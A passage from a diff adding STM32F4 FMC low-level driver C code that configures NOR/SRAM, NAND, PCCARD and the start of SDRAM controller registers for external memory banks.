ADDSET, ADDHLD, DATAST, BUSTURN and ACCMOD bits */ + tmpr &= ((uint32_t)~(FMC_BWTR1_ADDSET | FMC_BWTR1_ADDHLD | FMC_BWTR1_DATAST | \ + FMC_BWTR1_BUSTURN | FMC_BWTR1_ACCMOD)); + + tmpr |= (uint32_t)(Timing->AddressSetupTime |\ + ((Timing->AddressHoldTime) << 4U) |\ + ((Timing->DataSetupTime) << 8U) |\ + ((Timing->BusTurnAroundDuration) << 16U) |\ + (Timing->AccessMode)); + + Device->BWTR[Bank] = tmpr; + } + else + { + Device->BWTR[Bank] = 0x0FFFFFFFU; + } + + return HAL_OK; +} +/** + * @} + */ + +/** @addtogroup FMC_LL_NORSRAM_Private_Functions_Group2 + * @brief management functions + * +@verbatim + ============================================================================== + ##### FMC_NORSRAM Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FMC NORSRAM interface. + +@endverbatim + * @{ + */ +/** + * @brief Enables dynamically FMC_NORSRAM write operation. + * @param Device Pointer to NORSRAM device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_WriteOperation_Enable(FMC_NORSRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FMC_NORSRAM_BANK(Bank)); + + /* Enable write operation */ + Device->BTCR[Bank] |= FMC_WRITE_OPERATION_ENABLE; + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_NORSRAM write operation. + * @param Device Pointer to NORSRAM device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_WriteOperation_Disable(FMC_NORSRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FMC_NORSRAM_BANK(Bank)); + + /* Disable write operation */ + Device->BTCR[Bank] &= ~FMC_WRITE_OPERATION_ENABLE; + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup FMC_LL_NAND + * @brief NAND Controller functions + * + @verbatim + ============================================================================== + ##### How to use NAND device driver ##### + ============================================================================== + [..] + This driver contains a set of APIs to interface with the FMC NAND banks in order + to run the NAND external devices. + + (+) FMC NAND bank reset using the function FMC_NAND_DeInit() + (+) FMC NAND bank control configuration using the function FMC_NAND_Init() + (+) FMC NAND bank common space timing configuration using the function + FMC_NAND_CommonSpace_Timing_Init() + (+) FMC NAND bank attribute space timing configuration using the function + FMC_NAND_AttributeSpace_Timing_Init() + (+) FMC NAND bank enable/disable ECC correction feature using the functions + FMC_NAND_ECC_Enable()/FMC_NAND_ECC_Disable() + (+) FMC NAND bank get ECC correction code using the function FMC_NAND_GetECC() + +@endverbatim + * @{ + */ + +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) +/** @defgroup HAL_FMC_NAND_Group1 Initialization/de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FMC NAND interface + (+) De-initialize the FMC NAND interface + (+) Configure the FMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FMC_NAND device according to the specified + * control parameters in the FMC_NAND_HandleTypeDef + * @param Device Pointer to NAND device instance + * @param Init Pointer to NAND Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_Init(FMC_NAND_TypeDef *Device, FMC_NAND_InitTypeDef *Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Init->NandBank)); + assert_param(IS_FMC_WAIT_FEATURE(Init->Waitfeature)); + assert_param(IS_FMC_NAND_MEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FMC_ECC_STATE(Init->EccComputation)); + assert_param(IS_FMC_ECCPAGE_SIZE(Init->ECCPageSize)); + assert_param(IS_FMC_TCLR_TIME(Init->TCLRSetupTime)); + assert_param(IS_FMC_TAR_TIME(Init->TARSetupTime)); + + /* Get the NAND bank register value */ + tmpr = Device->PCR; + + /* Clear PWAITEN, PBKEN, PTYP, PWID, ECCEN, TCLR, TAR and ECCPS bits */ + tmpr &= ((uint32_t)~(FMC_PCR_PWAITEN | FMC_PCR_PBKEN | FMC_PCR_PTYP | \ + FMC_PCR_PWID | FMC_PCR_ECCEN | FMC_PCR_TCLR | \ + FMC_PCR_TAR | FMC_PCR_ECCPS)); + + /* Set NAND device control parameters */ + tmpr |= (uint32_t)(Init->Waitfeature |\ + FMC_PCR_MEMORY_TYPE_NAND |\ + Init->MemoryDataWidth |\ + Init->EccComputation |\ + Init->ECCPageSize |\ + ((Init->TCLRSetupTime) << 9U) |\ + ((Init->TARSetupTime) << 13U)); + + /* NAND bank registers configuration */ + Device->PCR = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_NAND Common space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_CommonSpace_Timing_Init(FMC_NAND_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Get the NAND bank 2 register value */ + tmpr = Device->PMEM; + + + /* Clear MEMSETx, MEMWAITx, MEMHOLDx and MEMHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PMEM_MEMSET2 | FMC_PMEM_MEMWAIT2 | FMC_PMEM_MEMHOLD2 | \ + FMC_PMEM_MEMHIZ2)); + + /* Set FMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U) + ); + + /* NAND bank registers configuration */ + Device->PMEM = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_NAND Attribute space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_AttributeSpace_Timing_Init(FMC_NAND_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Get the NAND bank register value */ + tmpr = Device->PATT; + + /* Clear ATTSETx, ATTWAITx, ATTHOLDx and ATTHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PATT_ATTSET2 | FMC_PATT_ATTWAIT2 | FMC_PATT_ATTHOLD2 | \ + FMC_PATT_ATTHIZ2)); + + /* Set FMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + /* NAND bank registers configuration */ + Device->PATT = tmpr; + + return HAL_OK; +} + + +/** + * @brief DeInitializes the FMC_NAND device + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_DeInit(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Disable the NAND Bank */ + __FMC_NAND_DISABLE(Device, Bank); + + /* De-initialize the NAND Bank */ + /* Set the FMC_NAND_BANK registers to their reset values */ + Device->PCR = 0x00000018U; + Device->SR = 0x00000040U; + Device->PMEM = 0xFCFCFCFCU; + Device->PATT = 0xFCFCFCFCU; + + return HAL_OK; +} + +/** + * @} + */ + + +/** @defgroup HAL_FMC_NAND_Group2 Control functions + * @brief management functions + * +@verbatim + ============================================================================== + ##### FMC_NAND Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FMC NAND interface. + +@endverbatim + * @{ + */ + + +/** + * @brief Enables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_ECC_Enable(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Enable ECC feature */ + Device->PCR |= FMC_PCR_ECCEN; + + return HAL_OK; +} + + +/** + * @brief Disables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_ECC_Disable(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Disable ECC feature */ + Device->PCR &= ~FMC_PCR_ECCEN; + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param ECCval Pointer to ECC value + * @param Bank NAND bank number + * @param Timeout Timeout wait value + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_GetECC(FMC_NAND_TypeDef *Device, uint32_t *ECCval, uint32_t Bank, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until FIFO is empty */ + while(__FMC_NAND_GET_FLAG(Device, Bank, FMC_FLAG_FEMPT) == RESET) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + return HAL_TIMEOUT; + } + } + } + + /* Get the ECCR register value */ + *ECCval = (uint32_t)Device->ECCR; + + return HAL_OK; +} + +/** + * @} + */ + +#else /* defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) */ +/** @defgroup HAL_FMC_NAND_Group1 Initialization/de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FMC NAND interface + (+) De-initialize the FMC NAND interface + (+) Configure the FMC clock and associated GPIOs + +@endverbatim + * @{ + */ +/** + * @brief Initializes the FMC_NAND device according to the specified + * control parameters in the FMC_NAND_HandleTypeDef + * @param Device Pointer to NAND device instance + * @param Init Pointer to NAND Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_Init(FMC_NAND_TypeDef *Device, FMC_NAND_InitTypeDef *Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Init->NandBank)); + assert_param(IS_FMC_WAIT_FEATURE(Init->Waitfeature)); + assert_param(IS_FMC_NAND_MEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FMC_ECC_STATE(Init->EccComputation)); + assert_param(IS_FMC_ECCPAGE_SIZE(Init->ECCPageSize)); + assert_param(IS_FMC_TCLR_TIME(Init->TCLRSetupTime)); + assert_param(IS_FMC_TAR_TIME(Init->TARSetupTime)); + + if(Init->NandBank == FMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PCR2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PCR3; + } + + /* Clear PWAITEN, PBKEN, PTYP, PWID, ECCEN, TCLR, TAR and ECCPS bits */ + tmpr &= ((uint32_t)~(FMC_PCR2_PWAITEN | FMC_PCR2_PBKEN | FMC_PCR2_PTYP | \ + FMC_PCR2_PWID | FMC_PCR2_ECCEN | FMC_PCR2_TCLR | \ + FMC_PCR2_TAR | FMC_PCR2_ECCPS)); + + /* Set NAND device control parameters */ + tmpr |= (uint32_t)(Init->Waitfeature |\ + FMC_PCR_MEMORY_TYPE_NAND |\ + Init->MemoryDataWidth |\ + Init->EccComputation |\ + Init->ECCPageSize |\ + ((Init->TCLRSetupTime) << 9U) |\ + ((Init->TARSetupTime) << 13U)); + + if(Init->NandBank == FMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PCR2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PCR3 = tmpr; + } + + return HAL_OK; + +} + +/** + * @brief Initializes the FMC_NAND Common space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_CommonSpace_Timing_Init(FMC_NAND_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + if(Bank == FMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PMEM2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PMEM3; + } + + /* Clear MEMSETx, MEMWAITx, MEMHOLDx and MEMHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PMEM2_MEMSET2 | FMC_PMEM2_MEMWAIT2 | FMC_PMEM2_MEMHOLD2 | \ + FMC_PMEM2_MEMHIZ2)); + + /* Set FMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U) + ); + + if(Bank == FMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PMEM2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PMEM3 = tmpr; + } + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_NAND Attribute space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_AttributeSpace_Timing_Init(FMC_NAND_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + if(Bank == FMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PATT2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PATT3; + } + + /* Clear ATTSETx, ATTWAITx, ATTHOLDx and ATTHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PATT2_ATTSET2 | FMC_PATT2_ATTWAIT2 | FMC_PATT2_ATTHOLD2 | \ + FMC_PATT2_ATTHIZ2)); + + /* Set FMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + if(Bank == FMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PATT2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PATT3 = tmpr; + } + + return HAL_OK; +} + +/** + * @brief DeInitializes the FMC_NAND device + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_DeInit(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Disable the NAND Bank */ + __FMC_NAND_DISABLE(Device, Bank); + + /* De-initialize the NAND Bank */ + if(Bank == FMC_NAND_BANK2) + { + /* Set the FMC_NAND_BANK2 registers to their reset values */ + Device->PCR2 = 0x00000018U; + Device->SR2 = 0x00000040U; + Device->PMEM2 = 0xFCFCFCFCU; + Device->PATT2 = 0xFCFCFCFCU; + } + /* FMC_Bank3_NAND */ + else + { + /* Set the FMC_NAND_BANK3 registers to their reset values */ + Device->PCR3 = 0x00000018U; + Device->SR3 = 0x00000040U; + Device->PMEM3 = 0xFCFCFCFCU; + Device->PATT3 = 0xFCFCFCFCU; + } + + return HAL_OK; +} + +/** + * @} + */ + +/** @addtogroup FMC_LL_NAND_Private_Functions_Group2 + * @brief management functions + * +@verbatim + ============================================================================== + ##### FMC_NAND Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FMC NAND interface. + +@endverbatim + * @{ + */ +/** + * @brief Enables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_ECC_Enable(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Enable ECC feature */ + if(Bank == FMC_NAND_BANK2) + { + Device->PCR2 |= FMC_PCR2_ECCEN; + } + else + { + Device->PCR3 |= FMC_PCR3_ECCEN; + } + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_ECC_Disable(FMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Disable ECC feature */ + if(Bank == FMC_NAND_BANK2) + { + Device->PCR2 &= ~FMC_PCR2_ECCEN; + } + else + { + Device->PCR3 &= ~FMC_PCR3_ECCEN; + } + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param ECCval Pointer to ECC value + * @param Bank NAND bank number + * @param Timeout Timeout wait value + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NAND_GetECC(FMC_NAND_TypeDef *Device, uint32_t *ECCval, uint32_t Bank, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NAND_DEVICE(Device)); + assert_param(IS_FMC_NAND_BANK(Bank)); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until FIFO is empty */ + while(__FMC_NAND_GET_FLAG(Device, Bank, FMC_FLAG_FEMPT) == RESET) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + return HAL_TIMEOUT; + } + } + } + + if(Bank == FMC_NAND_BANK2) + { + /* Get the ECCR2 register value */ + *ECCval = (uint32_t)Device->ECCR2; + } + else + { + /* Get the ECCR3 register value */ + *ECCval = (uint32_t)Device->ECCR3; + } + + return HAL_OK; +} + +/** + * @} + */ + +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) */ +/** + * @} + */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) +/** @addtogroup FMC_LL_PCCARD + * @brief PCCARD Controller functions + * + @verbatim + ============================================================================== + ##### How to use PCCARD device driver ##### + ============================================================================== + [..] + This driver contains a set of APIs to interface with the FMC PCCARD bank in order + to run the PCCARD/compact flash external devices. + + (+) FMC PCCARD bank reset using the function FMC_PCCARD_DeInit() + (+) FMC PCCARD bank control configuration using the function FMC_PCCARD_Init() + (+) FMC PCCARD bank common space timing configuration using the function + FMC_PCCARD_CommonSpace_Timing_Init() + (+) FMC PCCARD bank attribute space timing configuration using the function + FMC_PCCARD_AttributeSpace_Timing_Init() + (+) FMC PCCARD bank IO space timing configuration using the function + FMC_PCCARD_IOSpace_Timing_Init() +@endverbatim + * @{ + */ + +/** @addtogroup FMC_LL_PCCARD_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FMC PCCARD interface + (+) De-initialize the FMC PCCARD interface + (+) Configure the FMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FMC_PCCARD device according to the specified + * control parameters in the FMC_PCCARD_HandleTypeDef + * @param Device Pointer to PCCARD device instance + * @param Init Pointer to PCCARD Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_PCCARD_Init(FMC_PCCARD_TypeDef *Device, FMC_PCCARD_InitTypeDef *Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_PCCARD_DEVICE(Device)); + assert_param(IS_FMC_WAIT_FEATURE(Init->Waitfeature)); + assert_param(IS_FMC_TCLR_TIME(Init->TCLRSetupTime)); + assert_param(IS_FMC_TAR_TIME(Init->TARSetupTime)); + + /* Get PCCARD control register value */ + tmpr = Device->PCR4; + + /* Clear TAR, TCLR, PWAITEN and PWID bits */ + tmpr &= ((uint32_t)~(FMC_PCR4_TAR | FMC_PCR4_TCLR | FMC_PCR4_PWAITEN | \ + FMC_PCR4_PWID | FMC_PCR4_PTYP)); + + /* Set FMC_PCCARD device control parameters */ + tmpr |= (uint32_t)(Init->Waitfeature |\ + FMC_NAND_PCC_MEM_BUS_WIDTH_16 |\ + (Init->TCLRSetupTime << 9U) |\ + (Init->TARSetupTime << 13U)); + + Device->PCR4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_PCCARD Common space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_PCCARD_CommonSpace_Timing_Init(FMC_PCCARD_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_PCCARD_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get PCCARD common space timing register value */ + tmpr = Device->PMEM4; + + /* Clear MEMSETx, MEMWAITx, MEMHOLDx and MEMHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PMEM4_MEMSET4 | FMC_PMEM4_MEMWAIT4 | FMC_PMEM4_MEMHOLD4 | \ + FMC_PMEM4_MEMHIZ4)); + /* Set PCCARD timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + Device->PMEM4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_PCCARD Attribute space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_PCCARD_AttributeSpace_Timing_Init(FMC_PCCARD_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_PCCARD_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get PCCARD timing parameters */ + tmpr = Device->PATT4; + + /* Clear ATTSETx, ATTWAITx, ATTHOLDx and ATTHIZx bits */ + tmpr &= ((uint32_t)~(FMC_PATT4_ATTSET4 | FMC_PATT4_ATTWAIT4 | FMC_PATT4_ATTHOLD4 | \ + FMC_PATT4_ATTHIZ4)); + + /* Set PCCARD timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + Device->PATT4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FMC_PCCARD IO space Timing according to the specified + * parameters in the FMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_PCCARD_IOSpace_Timing_Init(FMC_PCCARD_TypeDef *Device, FMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0; + + /* Check the parameters */ + assert_param(IS_FMC_PCCARD_DEVICE(Device)); + assert_param(IS_FMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get FMC_PCCARD device timing parameters */ + tmpr = Device->PIO4; + + /* Clear IOSET4, IOWAIT4, IOHOLD4 and IOHIZ4 bits */ + tmpr &= ((uint32_t)~(FMC_PIO4_IOSET4 | FMC_PIO4_IOWAIT4 | FMC_PIO4_IOHOLD4 | \ + FMC_PIO4_IOHIZ4)); + + /* Set FMC_PCCARD device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + Device->PIO4 = tmpr; + + return HAL_OK; +} + +/** + * @brief DeInitializes the FMC_PCCARD device + * @param Device Pointer to PCCARD device instance + * @retval HAL status + */ +HAL_StatusTypeDef FMC_PCCARD_DeInit(FMC_PCCARD_TypeDef *Device) +{ + /* Check the parameters */ + assert_param(IS_FMC_PCCARD_DEVICE(Device)); + + /* Disable the FMC_PCCARD device */ + __FMC_PCCARD_DISABLE(Device); + + /* De-initialize the FMC_PCCARD device */ + Device->PCR4 = 0x00000018U; + Device->SR4 = 0x00000000U; + Device->PMEM4 = 0xFCFCFCFCU; + Device->PATT4 = 0xFCFCFCFCU; + Device->PIO4 = 0xFCFCFCFCU; + + return HAL_OK; +} + +/** + * @} + */ +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx */ + + +/** @addtogroup FMC_LL_SDRAM + * @brief SDRAM Controller functions + * + @verbatim + ============================================================================== + ##### How to use SDRAM device driver ##### + ============================================================================== + [..] + This driver contains a set of APIs to interface with the FMC SDRAM banks in order + to run the SDRAM external devices. + + (+) FMC SDRAM bank reset using the function FMC_SDRAM_DeInit() + (+) FMC SDRAM bank control configuration using the function FMC_SDRAM_Init() + (+) FMC SDRAM bank timing configuration using the function FMC_SDRAM_Timing_Init() + (+) FMC SDRAM bank enable/disable write operation using the functions + FMC_SDRAM_WriteOperation_Enable()/FMC_SDRAM_WriteOperation_Disable() + (+) FMC SDRAM bank send command using the function FMC_SDRAM_SendCommand() + +@endverbatim + * @{ + */ + +/** @addtogroup FMC_LL_SDRAM_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FMC SDRAM interface + (+) De-initialize the FMC SDRAM interface + (+) Configure the FMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FMC_SDRAM device according to the specified + * control parameters in the FMC_SDRAM_InitTypeDef + * @param Device Pointer to SDRAM device instance + * @param Init Pointer to SDRAM Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_SDRAM_Init(FMC_SDRAM_TypeDef *Device, FMC_SDRAM_InitTypeDef *Init) +{ + uint32_t tmpr1 = 0U; + uint32_t tmpr2 = 0U; + + /* Check the parameters */ + 